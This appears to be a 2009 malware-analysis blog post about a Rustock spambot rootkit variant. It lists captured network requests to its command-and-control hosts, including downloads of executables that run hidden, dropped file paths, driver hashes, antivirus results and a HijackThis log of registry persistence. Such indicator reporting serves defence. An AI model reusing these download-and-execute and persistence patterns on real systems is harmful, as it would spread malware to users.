Rustock is back again more active than ever!
Recently Steve received some new .EXE files classified as Rootkit.Rustock and we have analyzed one file to see if the beast Rustock is still active. The bad thing is that the results of this analysis reveal that the spam activity of Rustock is yet highly active…
During the analysis we noticed that the malware used a particular string for the User Agent for communicate with a specific domain: Gootkit ldr 1.0 … is this a new name for a new Malware Kit ???
The .EXE file after its execution, injected code into services.exe and then started to send various GET queries to a specific domain:
1 | 195.2.253.246 (catjepzcft.com) |
Network traffic:
1 2 3 4 5 6 7 8 9 10 11 | GET /progs/ptpqq/pmzznaann.php?adv=advxxx HTTP/1.1 Host: catjepzcft.com GET /progs/ptpqq/mmjjwjxt.php HTTP/1.1 Host: catjepzcft.com GET /progs/ptpqq/ebbxlllly.php HTTP/1.1 Host: catjepzcft.com GET /progs/ptpqq/spcmmzmnak.php HTTP/1.1 Host: catjepzcft.com |
All of the above *.php files redirect to PE (Portable Executable) files that are all downloaded in TEMP folder and are then executed hidden.
Rustock spam bots have C&C (Command and Control) domain names that are hardcoded inside the malware code, this technique allows the bot’s authors to change the controlled hosts dinamycally. This Rustock variant has started various requests with these domains:
1 2 3 | yopilazankaza.net grezasadaf.info mail.grezasadaf.info |
After, we noticed the malware sent some encrypted traffic to this IP:
1 | 74.52.83.83 (user.happyhost.org) |
We can see from the traffic below that the malware sent some info to the malicious domain, and our Hardware ID to identify our computer:
1 2 | GET /progs/ptpqq/pmmmaana.php?adv=advxxx&code1=LSI0&code2=0809&id=-[HD_ID]&p=1 HTTP/1.1 Host: catjepzcft.com |
Next, it started traffic with another domain:
1 2 3 | ctfmon.info 110.60.233.72.static.reverse.ltdomains.com 72.233.60.110 |
Network traffic:
1 2 | GET /cd/cd.php?id=5V9B6019C6A1FA0&ver=nz0 HTTP/1.1 Host: ctfmon.info |
And at this point, the malware started to send data to a new IP:
1 | 92.62.101.27 (ds27.esthost.eu) |
Network traffic:
1 2 3 | GET /d3n2829230.dat HTTP/1.0 User-Agent: Gootkit ldr 1.0 Host: 92.62.101.27:5191 |
Note how is named the User Agent: Gootkit ldr 1.0.
It may be the name of a NEW malware kit and ldr should stand for loader.
New traffic:
1 2 3 4 5 | GET /xxxxxxxxxxxxx HTTP/1.1 Host: damqrgldev.net GET /xxxxxxxxxxxxx HTTP/1.1 Host: damqrgldev.net |
The malware downloaded various malicious files (again) in TEMP Folder, and executed all of them… At this point, the malware started to send a lot of encrypted data to a domain (previously named):
1 | 92.62.101.27 (ds27.esthost.eu) |
Network traffic:
Packets : 505
Data Size : 329.768 Bytes
Total Size : 350.040 Bytes
And now started a heavy SPAM activity… the malware started to send various domain requests to a lot of email servers:
And then the spambot started to send a high amount of spam messages… the SPAM campaign is now more active than ever!!!
Now lets see what files were created by this Rustock variant:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 | C:\WINDOWS\system32\drivers\50cb8405.sys => DRIVER OF THE ROOTKIT C:\mtoaphpo.exe C:\lcrywx.exe C:\shcu.exe C:\1630016.bat C:\paohiqlm.exe C:\-[HARDWARE_ID] C:\WINDOWS\system32\drivers\lmo08ed.sys => ANOTHER DRIVER OF THE ROOTKIT C:\DOCUME~1\user\LOCALS~1\Temp\2081034192.exe C:\DOCUME~1\user\LOCALS~1\Temp\2092050032.exe C:\hhfls.exe C:\WINDOWS\system32\dllcache\svchost.exe.new C:\ntgxbfmx.exe C:\DOCUME~1\user\LOCALS~1\Temp\h531l.exe C:\adwitwxa.exe C:\zmuvmq.bat C:\xuulbic.exe C:\WINDOWS\system32\crypts.dll C:\DOCUME~1\user\LOCALS~1\Temp\csrssc.exe C:\DOCUME~1\user\LOCALS~1\Temp\rip10.exe C:\DOCUME~1\user\LOCALS~1\Temp\2.exe C:\DOCUME~1\user\LOCALS~1\Temp\7hjhffd.bat C:\Program Files\Common Files\imlhy.dll C:\DOCUME~1\user\LOCALS~1\Temp\g5i8nvt30.exe C:\DOCUME~1\user\LOCALS~1\Temp\zbqy6cseo.exe C:\DOCUME~1\user\LOCALS~1\Temp\yb2dpk.exe C:\DOCUME~1\user\LOCALS~1\Temp\ksjx1r.exe C:\DOCUME~1\user\LOCALS~1\Temp\y62pk.exe C:\DOCUME~1\user\LOCALS~1\Temp\phl7u.exe C:\DOCUME~1\user\LOCALS~1\Temp\x4l7wf4x.exe C:\DOCUME~1\user\LOCALS~1\Temp\acs2reslt4.exe |
Below there are the virus scanner reports of the two rootkit drivers:
Report Generated: 16.3.2009 at 0.25.01 (GMT 1)
File Name: 50cb8405.sys
File Size: 101 KB
MD5 Hash: 3B51541EB5EAE7342A191EF17C8B3D60
SHA1 Hash: 70A7C283EE4DFCE6AF490FB256FF944185238C20
Detection Rate: 3 on 24 (12,5 %)
Status: INFECTEDAntivirus Sig version Engine Version Result
a-squared 15/03/2009 4.0.0.32 –
Avira AntiVir 7.1.2.171 8.1.2.12 TR/Rootkit.Gen
Avast 090314-0 4.8.1229 –
AVG 270.11.15/2003 8.0.0.0 –
BitDefender 16/03/2009 7.0.0.2555 Backdoor.Rustock.NFE
ClamAV 15/03/2009 0.93.1.0 –
Comodo 1057 3.8 –
Dr.Web 16/03/2009 5.0 –
Ewido 16/03/2009 4.0.0.2 –
F-PROT 6 20090315 4.4.4.56 –
G DATA 19.3655 2.0.7309.847 –
IkarusT3 14/03/2009 1001044 –
Kaspersky 16/03/2009 8.0.0.357 –
McAfee 15/03/2009 5.1.0.0 –
Malware Hash Registry 16/03/2009 N/A –
NOD32 v3 3937 3.0.677 –
Norman 2009/03/13 5.92.08 –
Panda 07/02/2009 9.5.1.00 –
QuickHeal 14 March, 2009 10.0 –
Solo Antivirus 16/03/2009 8.0 –
Sophos 16/03/2009 4.32.0 –
TrendMicro 895(589500) 1.1-1001 –
VBA32 16/03/2009 3.12.0.300 Malware-Cryptor.Win32.General.3
VirusBuster 10.102.11 1.4.3 –
Report Generated: 16.3.2009 at 0.26.02 (GMT 1)
File Name: lmo08ed.sys
File Size: 21 KB
MD5 Hash: 1614229CC85D2F0DA1668BEC2AA2966E
SHA1 Hash: F2347ABAD8541540040D69DF6EC7F9104B998C74
Detection Rate: 1 on 24 (4,16 %)
Status: INFECTEDAntivirus Sig version Engine Version Result
a-squared 15/03/2009 4.0.0.32 –
Avira AntiVir 7.1.2.171 8.1.2.12 –
Avast 090314-0 4.8.1229 –
AVG 270.11.15/2003 8.0.0.0 –
BitDefender 16/03/2009 7.0.0.2555 –
ClamAV 15/03/2009 0.93.1.0 –
Comodo 1057 3.8 –
Dr.Web 16/03/2009 5.0 –
Ewido 16/03/2009 4.0.0.2 –
F-PROT 6 20090315 4.4.4.56 –
G DATA 19.3655 2.0.7309.847 –
IkarusT3 14/03/2009 1001044 –
Kaspersky 16/03/2009 8.0.0.357 –
McAfee 15/03/2009 5.1.0.0 –
Malware Hash Registry 16/03/2009 N/A –
NOD32 v3 3937 3.0.677 –
Norman 2009/03/13 5.92.08 Trojan W32/Rootkit.AJUT
Panda 07/02/2009 9.5.1.00 –
QuickHeal 14 March, 2009 10.0 –
Solo Antivirus 16/03/2009 8.0 –
Sophos 16/03/2009 4.32.0 –
TrendMicro 895(589500) 1.1-1001 –
VBA32 16/03/2009 3.12.0.300 –
VirusBuster 10.102.11 1.4.3 –
The rootkit installs always the 3 (famous) SSDT hooks and this time we can see that it hides also its driver:
Hidden Driver:
Stealth Code:
Kernel Modifications:
And below, there is an HijackThis log:
Running processes:
C:\DOCUME~1\user\LOCALS~1\Temp\csrssc.exe
C:\DOCUME~1\user\LOCALS~1\Temp\ig2wf5bum4.exe
C:\DOCUME~1\user\LOCALS~1\Temp\i10ftqrh0.exeO4 – HKLM\..\Run: [xsigsud7qw7f8rwrt8] C:\DOCUME~1\user\LOCALS~1\Temp\h531l.exe
O4 – HKLM\..\Run: [y0agaspmnmxkw4djb3as16eeuar] C:\DOCUME~1\user\LOCALS~1\Temp\g5i8nvt30.exe
O4 – HKLM\..\Run: [t50zoy0kqddd9qjam7lfo] C:\DOCUME~1\user\LOCALS~1\Temp\f35avpt2j.exe
O4 – HKLM\..\Run: [krae4io3anewkh6n1c32] C:\DOCUME~1\user\LOCALS~1\Temp\go82c4irn.exe
O4 – HKLM\..\Run: [i3ommwe1iq63eplz1l5shm39kd3nr] C:\DOCUME~1\user\LOCALS~1\Temp\ldav9bgf.exe
O4 – HKLM\..\Run: [wlad2loiah66phy9e] C:\DOCUME~1\user\LOCALS~1\Temp\s7rg8a.exe
O4 – HKLM\..\Run: [kq005y3gtd5grvxemgyp77puvoxeh] C:\DOCUME~1\user\LOCALS~1\Temp\ceu9gzw17.exe
O4 – HKLM\..\Run: [y2l3ad3xmfd99c18hrirbgvnztg] C:\DOCUME~1\user\LOCALS~1\Temp\zbqy6cseo.exe
O4 – HKLM\..\Run: [ejk9b1onvd75gfmvp2j] C:\DOCUME~1\user\LOCALS~1\Temp\yb2dpk.exe
O4 – HKLM\..\Run: [bicya6fq4l8rm17m0e3tk] C:\DOCUME~1\user\LOCALS~1\Temp\rh1lty.exe
O4 – HKLM\..\Run: [aotn8li6zj2a9a3pd5nk7y] C:\DOCUME~1\user\LOCALS~1\Temp\p27p2.exe
O4 – HKLM\..\Run: [x4veff6kyajo16mhq18ujw8vj3dpa] C:\DOCUME~1\user\LOCALS~1\Temp\ksjx1r.exe
O4 – HKLM\..\Run: [omxf835aubqqpxvzfdvre094g2m0m] C:\DOCUME~1\user\LOCALS~1\Temp\y62pk.exe
O4 – HKLM\..\Run: [eo8in0uixmmd988l5dtstn0gju] C:\DOCUME~1\user\LOCALS~1\Temp\phl7u.exe
O4 – HKLM\..\Run: [e9vetnuspuff604s9iu4bpt] C:\DOCUME~1\user\LOCALS~1\Temp\x4l7wf4x.exe
O4 – HKLM\..\Run: [urg2avbreylonz] C:\DOCUME~1\user\LOCALS~1\Temp\acs2reslt4.exe
O4 – HKCU\..\Run: [nuj56tlag39hly] C:\DOCUME~1\user\LOCALS~1\Temp\d2q8qn.exe
O4 – HKCU\..\Run: [xjtsi4b3oq3] C:\DOCUME~1\user\LOCALS~1\Temp\pyphk.exe
O4 – HKCU\..\Run: [qcsn79k6rirjgr] C:\DOCUME~1\user\LOCALS~1\Temp\l2jna51.exe
O4 – HKCU\..\Run: [oso3bevvdmzr1] C:\DOCUME~1\user\LOCALS~1\Temp\bvtrncc.exe
O4 – HKCU\..\Run: [ubvttqcqfdt7yxo4gt9opxraitvp] C:\DOCUME~1\user\LOCALS~1\Temp\ig2wf5bum4.exe
O4 – HKCU\..\Run: [qiojoeqys7e1f4kgazo4eycu8] C:\DOCUME~1\user\LOCALS~1\Temp\i10ftqrh0.exe
O7 – HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1
O20 – Winlogon Notify: crypt – C:\WINDOWS\SYSTEM32\crypts.dll
The malware disabled also the regedit.exe, as we can see from this value the malware changed the DWORD of the value named DisableRegedit to 1:
O7 – HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1
Leave a Reply